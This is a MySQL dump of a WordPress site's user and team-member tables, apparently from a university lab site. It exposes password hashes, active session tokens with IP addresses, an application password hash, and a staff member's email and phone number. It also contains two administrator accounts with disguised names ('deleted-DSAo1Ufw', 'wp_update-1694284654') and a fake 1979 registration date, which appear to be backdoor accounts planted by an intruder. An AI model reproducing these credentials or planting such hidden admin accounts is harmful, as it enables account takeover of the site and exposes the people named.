-- Table structure for table `wp_usermeta`
--

DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=38 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_usermeta`
--

LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','dice'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','fresh'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(13,1,'wp_user_level','10'),(14,1,'dismissed_wp_pointers','theme_editor_notice'),(15,1,'show_welcome_panel','1'),(17,1,'wp_dashboard_quick_press_last_post_id','1835'),(18,1,'community-events-location','a:1:{s:2:\"ip\";s:12:\"131.96.218.0\";}'),(19,1,'wp_user-settings','libraryContent=browse&ampeditor=tinymce'),(20,1,'wp_user-settings-time','1651286309'),(21,1,'nav_menu_recently_edited','5'),(22,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(23,1,'metaboxhidden_nav-menus','a:1:{i:0;s:12:\"add-post_tag\";}'),(26,1,'session_tokens','a:1:{s:64:\"7ff5332fb11f113ddd5453303275aefecd40411dc1bf8c7cfb64635c423bdc34\";a:4:{s:10:\"expiration\";i:1731764691;s:2:\"ip\";s:12:\"24.99.23.144\";s:2:\"ua\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0\";s:5:\"login\";i:1731591891;}}'),(27,2,'wp_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}'),(28,2,'wp_user_level','10'),(29,3,'wp_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}'),(30,3,'wp_user_level','10'),(31,2,'session_tokens','a:1:{s:64:\"62abb7ec28d6f8f72f1ecaf1f1032bae51e59b5406f4f7c8c7b77ca8f2c478c2\";a:4:{s:10:\"expiration\";i:1712956893;s:2:\"ip\";s:14:\"116.203.192.11\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\";s:5:\"login\";i:1712784093;}}'),(32,2,'wp_dashboard_quick_press_last_post_id','1833'),(33,3,'session_tokens','a:1:{s:64:\"cbb733f374fbf5fc22e1abf8fd99b75b00ddd098ab41bde6179f6f12124fdfbe\";a:4:{s:10:\"expiration\";i:1712927268;s:2:\"ip\";s:14:\"139.162.61.185\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\";s:5:\"login\";i:1712754468;}}'),(34,3,'wp_dashboard_quick_press_last_post_id','1831'),(35,3,'_application_passwords','a:1:{i:0;a:7:{s:4:\"uuid\";s:36:\"e4205579-6337-47a2-9251-137297e0d4fa\";s:6:\"app_id\";s:0:\"\";s:4:\"name\";s:8:\"7c63dbb9\";s:8:\"password\";s:34:\"$P$Bsch684qsZcKiBErS3ClFTg374MAGx0\";s:7:\"created\";i:1694290090;s:9:\"last_used\";N;s:7:\"last_ip\";N;}}'),(36,1,'wp_persisted_preferences','a:2:{s:14:\"core/edit-post\";a:2:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;}s:9:\"_modified\";s:24:\"2023-09-27T01:04:33.477Z\";}'),(37,1,'frmt_dismissed_messages','a:1:{i:0;s:28:\"forminator_promote_free_plan\";}');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_users`
--

DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_users`
--

LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'dice','$P$BlrME86V0b5iR2g5JiqbNkL4e/d.Ql/','dice','dice@pobox.pw','https://gsudice.dataconn.net','2022-02-14 21:44:32','',0,'dice'),(2,'deleted-DSAo1Ufw','$P$BAFCavMdGZcooofnd0M0h.KM8yzM9J1','deleted-DSAo1Ufw','','','1979-01-01 00:00:00','',0,'deleted-DSAo1Ufw'),(3,'wp_update-1694284654','$P$B5HuDvEVbIBs7xAdHtsCH8.bCSDzxR/','wp_update-1694284654','','','1979-01-01 00:00:00','',0,'wp_update-1694284654');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpm_6310_category`
--

DROP TABLE IF EXISTS `wp_wpm_6310_category`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wpm_6310_category` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(100) DEFAULT NULL,
  `c_name` varchar(100) DEFAULT NULL,
  `serial` varchar(100) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `c_name` (`c_name`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpm_6310_category`
--

LOCK TABLES `wp_wpm_6310_category` WRITE;
/*!40000 ALTER TABLE `wp_wpm_6310_category` DISABLE KEYS */;
INSERT INTO `wp_wpm_6310_category` VALUES (1,'All Members','c-1588100157','1'),(2,'HR & Accounts','c-1588100457','2'),(3,'Sales & Marketing','c-1588101163','3'),(4,'IT Support','c-1558101163','4');
/*!40000 ALTER TABLE `wp_wpm_6310_category` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpm_6310_icons`
--

DROP TABLE IF EXISTS `wp_wpm_6310_icons`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wpm_6310_icons` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(100) DEFAULT NULL,
  `class_name` varchar(100) DEFAULT NULL,
  `color` varchar(100) DEFAULT NULL,
  `bgcolor` varchar(100) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=40 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpm_6310_icons`
--

LOCK TABLES `wp_wpm_6310_icons` WRITE;
/*!40000 ALTER TABLE `wp_wpm_6310_icons` DISABLE KEYS */;
INSERT INTO `wp_wpm_6310_icons` VALUES (1,'Linkedin','fab fa-linkedin-in','#ffffff','rgba(0, 119, 181, 1)'),(2,'Twitter','fab fa-twitter','#ffffff','rgba(85, 172, 238, 1)'),(3,'Facebook','fab fa-facebook-f','#ffffff','rgba(59, 89, 153, 1)'),(4,'Skype','fab fa-skype','#ffffff','rgba(0, 175, 240, 1)'),(5,'Dropbox','fab fa-dropbox','#ffffff','rgba(0, 126, 229, 1)'),(6,'Wordpress','fab fa-wordpress','#ffffff','rgba(33, 117, 155, 1)'),(7,'vimeo','fab fa-vimeo-v','#ffffff','rgba(26, 183, 234, 1)'),(8,'Slideshare','fab fa-slideshare','#ffffff','rgba(0, 119, 181, 1)'),(9,'Vk','fab fa-vk','#ffffff','rgba(76, 117, 163, 1)'),(10,'Tumblr','fab fa-tumblr','#ffffff','rgba(52, 70, 93, 1)'),(11,'Yahoo','fab fa-yahoo','#ffffff','rgba(65, 0, 147, 1)'),(12,'Google Plus','fab fa-google-plus-g','#ffffff','rgba(221, 75, 57, 1)'),(13,'Pinterest','fab fa-pinterest-p','#ffffff','rgba(189, 8, 28, 1)'),(14,'Youtube','fab fa-youtube','#ffffff','rgba(205, 32, 31, 1)'),(15,'Stumbleupon','fab fa-stumbleupon','#ffffff','rgba(235, 73, 36, 1)'),(16,'Reddit','fab fa-reddit-alien','#ffffff','rgba(255, 87, 0, 1)'),(17,'Quora','fab fa-quora','#ffffff','rgba(185, 43, 39, 1)'),(18,'Yelp','fab fa-yelp','#ffffff','rgba(175, 6, 6, 1)'),(19,'Weibo','fab fa-weibo','#fafafa','rgba(223, 32, 41, 1)'),(20,'Producthunt','fab fa-product-hunt','#ffffff','rgba(218, 85, 47, 1)'),(21,'Hackernews','fab fa-hacker-news','#ffffff','rgba(255, 102, 0, 1)'),(22,'Soundcloud','fab fa-soundcloud','#ffffff','rgba(255, 51, 0, 1)'),(23,'Blogger','fab fa-blogger-b','#ffffff','rgba(245, 125, 0, 1)'),(24,'Whatsapp','fab fa-whatsapp','#ffffff','rgba(37, 211, 102, 1)'),(25,'Wechat','fab fa-weixin','#ffffff','rgba(9, 184, 62, 1)'),(26,'Medium','fab fa-medium-m','#ffffff','rgba(2, 184, 117, 1)'),(27,'Vine','fab fa-vine','#ffffff','rgba(0, 180, 137, 1)'),(28,'Slack','fab fa-slack-hash','#ffffff','rgba(58, 175, 133, 1)'),(29,'Instagram','fab fa-instagram','#e4405f','rgba(255, 255, 255, 1)'),(30,'Dribbble','fab fa-dribbble','#ffffff','rgba(234, 76, 137, 1)'),(31,'Flickr','fab fa-flickr','#ffffff','rgba(255, 0, 132, 1)'),(32,'Foursquare','fab fa-foursquare','#ffffff','rgba(249, 72, 119, 1)'),(33,'Behance','fab fa-behance','#ffffff','rgba(19, 20, 24, 1)'),(34,'Snapchat','fab fa-snapchat-ghost','#ffffff','rgba(255, 252, 0, 1)'),(35,'Paypal','fab fa-paypal','#ffffff','rgba(0, 48, 135, 1)'),(36,'Bandcamp','fab fa-bandcamp','#ffffff','rgba(0, 150, 136, 1)'),(37,'Email','fas fa-envelope','#ffffff','rgba(0, 150, 136, 1)'),(38,'Phone','fas fa-phone-square-alt','#ffffff','rgba(0, 150, 136, 1)'),(39,'Fax','fas fa-fax','#ffffff','rgba(0, 150, 136, 1)');
/*!40000 ALTER TABLE `wp_wpm_6310_icons` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpm_6310_member`
--

DROP TABLE IF EXISTS `wp_wpm_6310_member`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wpm_6310_member` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(100) DEFAULT NULL,
  `designation` varchar(100) DEFAULT NULL,
  `profile_details_type` tinyint(4) NOT NULL DEFAULT 0,
  `profile_url` text DEFAULT NULL,
  `open_new_tab` tinyint(4) NOT NULL DEFAULT 0,
  `profile_details` text DEFAULT NULL,
  `effect` varchar(100) DEFAULT NULL,
  `image` text DEFAULT NULL,
  `hover_image` text DEFAULT NULL,
  `iconids` text DEFAULT NULL,
  `iconurl` text DEFAULT NULL,
  `category` text DEFAULT NULL,
  `contact_info` text DEFAULT NULL,
  `skills` text DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpm_6310_member`
--

LOCK TABLES `wp_wpm_6310_member` WRITE;
/*!40000 ALTER TABLE `wp_wpm_6310_member` DISABLE KEYS */;
INSERT INTO `wp_wpm_6310_member` VALUES (6,'Chetan Tiwari','Director',1,'https://geosciences.gsu.edu/profile/chetan-tiwari/',1,'','','','','2,1','ctiwari78||||https://www.linkedin.com/in/chetan-tiwari','','Email||||ctiwari@gsu.edu####||||####Phone||||4049190757','');
/*!40000 ALTER TABLE `wp_wpm_6310_member` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpm_6310_style`
--

DROP TABLE IF EXISTS `wp_wpm_6310_style`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wpm_6310_style` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(100) DEFAULT NULL,
  `style_name` varchar(100) DEFAULT NULL,
  `css` text DEFAULT NULL,
  `slider` text DEFAULT NULL,
  `memberid` text DEFAULT NULL,
  `memberorder` text DEFAULT NULL,
  `categoryids` text DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpm_6310_style`
--

LOCK TABLES `wp_wpm_6310_style` WRITE;
/*!40000 ALTER TABLE `wp_wpm_6310_style` DISABLE KEYS */;
INSERT INTO `wp_wpm_6310_style` VALUES (1,'DICE','template-02','4@@##@@1@@##@@1||0|2|rgba(172, 19, 14, 1)||nai|rgba(51, 52, 62, 1)|0|0|rgba(255, 3, 3, 0.93)|12|rgb(255, 255, 255)|||500|uppercase|Shanti|24|14|rgb(255, 255, 255)|200|capitalize|Shanti|18||35|35|1||0|65|1','0||4000|true|fas fa-angle|18|10|rgba(0, 0, 0, 0.8)|rgba(255, 255, 255, 1)|rgba(130, 130, 130, 0.81)|rgba(255, 255, 255, 1)|true|10|10|rgba(0, 0, 0, 0.94)|rgba(190, 190, 190, 1)|50|3||||0|Amaranth|14|20|0|15|center|rgb(0, 0, 0)|rgb(190, 190, 190)|rgb(0, 0, 0)|rgb(255, 255, 255)|100|100|none|none||||||0|0|||||||||0|5|||||||||0|0|4||||||||0|12|14|18|rgb(0, 0, 0)|rgb(0, 0, 0)|Amaranth|100|none|center|0|15|100|none|none||Search by Name or Designation|flex-end|1|rgba(0, 0, 0, 1)|50|rgb(0, 0, 0)|10|rgb(128, 128, 128)|40||||||0|14|rgb(255, 255, 255)|rgb(255, 255, 255)|1|rgba(0, 0, 0, 0.8)|rgba(0, 179, 149, 0.8)|rgba(0, 94, 78, 0.8)|rgb(255, 255, 255)|rgba(54, 54, 54, 0.8)|100|Amaranth|30|30|5|20|left|3||||||||center|15||||1|22|rgb(17, 1, 0)|14|rgb(0, 0, 0)|14|rgb(0, 0, 0)|18|rgb(0, 100, 0)|14|rgb(0, 0, 0)|Arimo|Arimo|Arimo|Amaranth|Amaranth|||||||||||||||30|rgb(0, 150, 136)|20|rgb(96, 125, 139)|16|rgb(0, 0, 0)|15|rgb(128, 128, 128)|15|rgb(0, 0, 0)|Amaranth|Amaranth|Arimo|Amaranth|Amaranth|HI I\\\'M|||||||||||||||30|rgb(7, 203, 121)|18|rgb(128, 128, 128)|16|rgb(0, 0, 0)|15|rgb(0, 0, 0)|15|rgb(128, 128, 128)|Amaranth|Amaranth|Arimo|Amaranth|Amaranth|rgb(7, 203, 121)|I\\\'m|HELLO|||||||||||||30|rgb(255, 255, 255)|18|rgb(255, 255, 0)|16|rgb(68, 68, 68)|15|rgb(255, 255, 255)|15|rgb(255, 255, 255)|Amaranth|Amaranth|Arimo|Amaranth|Amaranth|rgb(6, 167, 99)|rgb(68, 68, 68)|center|||||||||||||25|rgb(255, 255, 255)|20|rgb(68, 68, 68)|16|rgb(190, 190, 190)|15|rgb(255, 255, 255)|15|rgb(190, 190, 190)|Amaranth|Amaranth|Arimo|Amaranth|Amaranth|rgb(7, 203, 121)|||||||||||||||25|rgb(101, 97, 97)|18|rgb(140, 140, 140)|16|rgb(53, 53, 53)|15|rgb(0, 100, 0)|15|rgb(68, 68, 68)|Amaranth|Amaranth|Arimo|Amaranth|Amaranth|||||||||||||||||Read more|33|120|12|rgb(255, 255, 255)|rgb(255, 255, 255)|0|rgb(255, 0, 98)|rgb(255, 0, 98)|3|rgb(49, 204, 199)|rgb(204, 49, 90)|100|capitalize|center|Amaranth|0|0|relative||||||12|16|capitalize|rgb(0, 0, 0)|rgb(255, 255, 255)|100|Amaranth|6|10|1|rgb(0, 62, 112)|0|rgb(255, 255, 255)|rgb(2, 157, 209)|rgba(0, 208, 255, 1)|0|10|0|1|rgb(255, 255, 255)|rgb(0, 0, 0)|rgb(0, 0, 0)|rgb(0, 0, 0)|rgb(0, 0, 0)|rgb(0, 0, 0)','||##||0||##||c-1588100157##@@####||##c-1588100457##@@####||##c-1588101163##@@####||##c-1558101163##@@##','','1,2,3,4');
/*!40000 ALTER TABLE `wp_wpm_6310_style` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2024-11-30  4:32:39